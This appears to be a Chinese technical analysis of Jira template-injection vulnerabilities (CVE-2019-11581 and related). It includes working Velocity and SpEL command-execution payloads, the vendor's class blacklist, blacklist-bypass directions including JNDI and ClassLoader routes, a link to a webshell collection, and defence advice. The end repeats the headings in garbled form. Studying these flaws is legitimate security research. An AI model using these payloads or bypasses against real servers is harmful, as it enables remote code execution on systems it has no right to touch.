Atlassian JIRA服务器模板注入漏洞分析与挖掘技术文档<\/h1>

一、漏洞概述<\/h2>
本文档详细分析Atlassian JIRA服务器中的模板注入漏洞(CVE-2019-11581及相关漏洞)，包括漏洞原理、利用方式、修复方案以及挖掘方法。<\/p>

二、漏洞复现及分析<\/h2>

1. 漏洞复现环境搭建<\/h3>

搭建SMTP服务器(可使用QQ SMTP)<\/li>
开启联系管理员表单：http:\/\/localhost:8080\/secure\/admin\/EditApplicationProperties!default.jspa<\/code><\/li>

注意：即使SMTP服务未正确配置，漏洞也会在连接SMTP服务前触发<\/li>
<\/ul>
2. POC分析<\/h3>
基本POC路径<\/strong>：<\/p>
\/secure\/ContactAdministrators!default.jspa
<\/code><\/pre>
POC示例<\/strong>：<\/p>
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('touch \/tmp\/success').waitFor()
<\/code><\/pre>
3. 漏洞触发流程<\/h3>


请求处理流程<\/strong>：<\/p>

JiraWebworkActionDispatcher作为主分发器<\/li>
派发给通用分发器执行任务<\/li>
通过属性描述器获取和设置属性<\/li>
<\/ul>
<\/li>

邮件发送流程<\/strong>：<\/p>

管理员账号验证通过后进入sendMail<\/li>
模板渲染是漏洞触发关键点<\/li>
最终由schedulerqueuework唤醒发送邮件任务<\/li>
<\/ul>
<\/li>

模板渲染关键点<\/strong>：<\/p>

com.atlassian.jira.mail.builder.EmailRenderer#renderEmailBody<\/code><\/li>
变量传入后在AST reference中递归执行<\/li>
反射调用链最终触发漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
三、漏洞原理深入分析<\/h2>
1. 为什么subject可以被当作模板解析<\/h3>

在创建EmailBuilder<\/code>的item<\/code>对象时，subjectTemplate<\/code>已经是Fragment<\/code>类<\/li>
Fragment<\/code>会从content中取字段进行解析<\/li>
文件路径同样存在模板注入风险<\/li>
<\/ul>
关键代码<\/strong>：<\/p>
MailQueueItem item =<\/span> (<\/span>new<\/span> EmailBuilder(<\/span>email,<\/span> this<\/span>.<\/span>getMimeType<\/span>(<\/span>administrator),<\/span> I18nBean.<\/span>getLocaleFromUser<\/span>(<\/span>administrator)))<\/span>
<\/span><\/span>    .<\/span>withSubject<\/span>(<\/span>this<\/span>.<\/span>subject<\/span>)<\/span>
<\/span><\/span>    .<\/span>withBodyFromFile<\/span>(<\/span>this<\/span>.<\/span>getTemplateDirectory<\/span>(<\/span>administrator)<\/span> +<\/span> "contactadministrator.vm"<\/span>)<\/span>
<\/span><\/span>    .<\/span>addParameters<\/span>(<\/span>velocityParams)<\/span>
<\/span><\/span>    .<\/span>renderLater<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2. 从邮件body触发模板注入(CVE-2021-39115)<\/h3>

利用Jira Administrator权限覆盖vm文件<\/li>
在vm文件中插入payload<\/li>
文件路径示例：\/jira\/atlassian-jira-software-8.2.2-standalone\/atlassian-jira\/WEB-INF\/classes\/templates\/email\/html\/includes\/header.vm<\/code><\/li>
<\/ul>
POC示例<\/strong>：<\/p>
#set($SpelExpressionParser = $jirautils.loadComponent('org.springframework.expression.spel.standard.SpelExpressionParser', $i18n.getClass()))
$SpelExpressionParser.parseRaw("T(java.lang.Runtime).getRuntime().exec('touch \/tmp\/success4')").getValue()
<\/code><\/pre>
3. 常规payload失效原因分析<\/h3>
常规payload示例<\/strong>：<\/p>
#set($x=$i18n.getClass())
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
#set($ex=$rt.getRuntime().exec('touch \/tmp\/success66'))
$ex.waitFor()
<\/code><\/pre>
失效原因<\/strong>：<\/p>

在Class类中寻找getRuntime方法会失败<\/li>
反射机制限制：Runtime<\/code>构造方法是私有的，只能通过getRuntime<\/code>获取实例<\/li>
<\/ul>
解决方案<\/strong>：<\/p>
#set($x=$i18n.getClass())
#set($runcls=$x.class.forName("java.lang.Runtime"))
#set($runcon=$runcls.getDeclaredConstructor())
$runcon.setAccessible(true)
$runcon.newInstance().exec("touch \/tmp\/successRt")
<\/code><\/pre>
4. 其他利用方式<\/h3>

SpEL表达式注入<\/strong><\/li>
ScriptEngine方式<\/strong><\/li>
ProcessBuilder方式<\/strong><\/li>
<\/ol>
ProcessBuilder改进版<\/strong>：<\/p>
#set($x=$i18n.getClass())
#set($list=$x.class.forName("java.util.List"))
#set($pbcls=$x.class.forName("java.lang.ProcessBuilder"))
#set($pbcon=$pbcls.getDeclaredConstructor($list))
#set($alistcls=$x.class.forName("java.util.ArrayList"))
#set($arrtest=["\/bin\/sh","-c","touch \/tmp\/successPB"])
#set($pb=$pbcon.newInstance($arrtest))
$pb.start()
<\/code><\/pre>
5. 其他触发点<\/h3>

不需要发送邮件即可触发模板引擎<\/li>
可在footer.vm<\/code>等文件中插入payload<\/li>
登录页面页脚也会触发<\/li>
<\/ul>
四、JIRA的修复方式<\/h2>
1. 黑名单机制<\/h3>

在调用类方法前校验是否在黑名单中<\/li>
黑名单类包括：
webwork.util.ValueStack
javax.el.ELProcessor
javax.script.ScriptEngineManager
java.lang.ProcessBuilder
javax.el.ImportHandler
javax.el.ELManager
<\/code><\/pre>
<\/li>
<\/ul>
2. 修复原理<\/h3>

在org.apache.velocity.util.introspection.UberspectImpl#getMethod<\/code>中<\/li>
从配置文件读取黑名单并填入list<\/li>
如果类属于黑名单包，则返回空方法<\/li>
<\/ul>
关键方法<\/strong>：<\/p>

org.apache.velocity.util.introspection.SecureIntrospectorImpl#checkObjectExecutePermission<\/code><\/li>
过滤一维数组和黑名单包中的类<\/li>
<\/ul>
五、漏洞挖掘方法<\/h2>
1. 挖掘思路<\/h3>

二维数组绕过<\/strong>（已被封杀）<\/li>
黑名单绕过<\/strong><\/li>
<\/ol>
2. 可利用类方向<\/h3>


命令执行类<\/strong>：<\/p>

ProcessImpl<\/li>
ProcessBuilder<\/li>
Runtime<\/li>
MethodAccessor<\/li>
<\/ul>
<\/li>

表达式类<\/strong>：<\/p>

ELProcessor<\/li>
ScriptEngine<\/li>
<\/ul>
<\/li>

JNDI\/RMI<\/strong>：<\/p>

通过恶意服务器执行<\/li>
JdbcRowSetImpl<\/li>
<\/ul>
<\/li>

反序列化相关类<\/strong><\/p>
<\/li>

自定义类<\/strong>：<\/p>

利用ClassLoader技术<\/li>
继承自ClassLoader的类<\/li>
引用的Utils类<\/li>
<\/ul>
<\/li>
<\/ol>
3. 关键点<\/h3>

只要类不在黑名单中，就有利用可能<\/li>
Context上下文中的对象非常重要（如i18n和jirautils）<\/li>
<\/ul>
六、为什么可以使用i18n和jirautils<\/h2>

这些类被预先注入到context容器中<\/li>
通过com.atlassian.jira.mail.JiraMailQueueUtils#getContextParamsMaster<\/code>初始化并注入对象<\/li>
从statingParams读取并初始化后注入对象<\/li>
<\/ul>
七、防御建议<\/h2>

及时更新到修复版本（4.17.0及之后版本增加了更多黑名单类）<\/li>
严格控制模板文件写入权限<\/li>
监控可疑的模板文件修改<\/li>
限制反射调用权限<\/li>
<\/ol>
八、参考资源<\/h2>

Velocity模板引擎语法：https:\/\/www.cnblogs.com\/daijun\/p\/6133430.html<\/li>
JSP Webshell示例：https:\/\/github.com\/threedr3am\/JSP-Webshells<\/li>
Atlassian官方文档：https:\/\/docs.atlassian.com\/DAC\/javadoc\/opensymphony-webwork\/1.4-atlassian-17\/reference\/webwork\/action\/ActionContext.html<\/li>
<\/ol>

Atlassian JIRA服务器模板注入漏洞分析与挖掘技术文档<\/h1>

一、漏洞概述<\/h2> 本文档详细分析Atlassian JIRA服务器中的模板注入漏洞(CVE-2019-11581及相关漏洞)，包括漏洞原理、利用方式、修复方案以及挖掘方法。<\/p>

二、漏洞复现及分析<\/h2>

三、漏洞原理深入分析<\/h2>

四、JIRA的修复方式<\/h2>

五、漏洞挖掘方法<\/h2>

一、漏洞概述<\/h2>
本文档详细分析Atlassian JIRA服务器中的模板注入漏洞(CVE-2019-11581及相关漏洞)，包括漏洞原理、利用方式、修复方案以及挖掘方法。<\/p>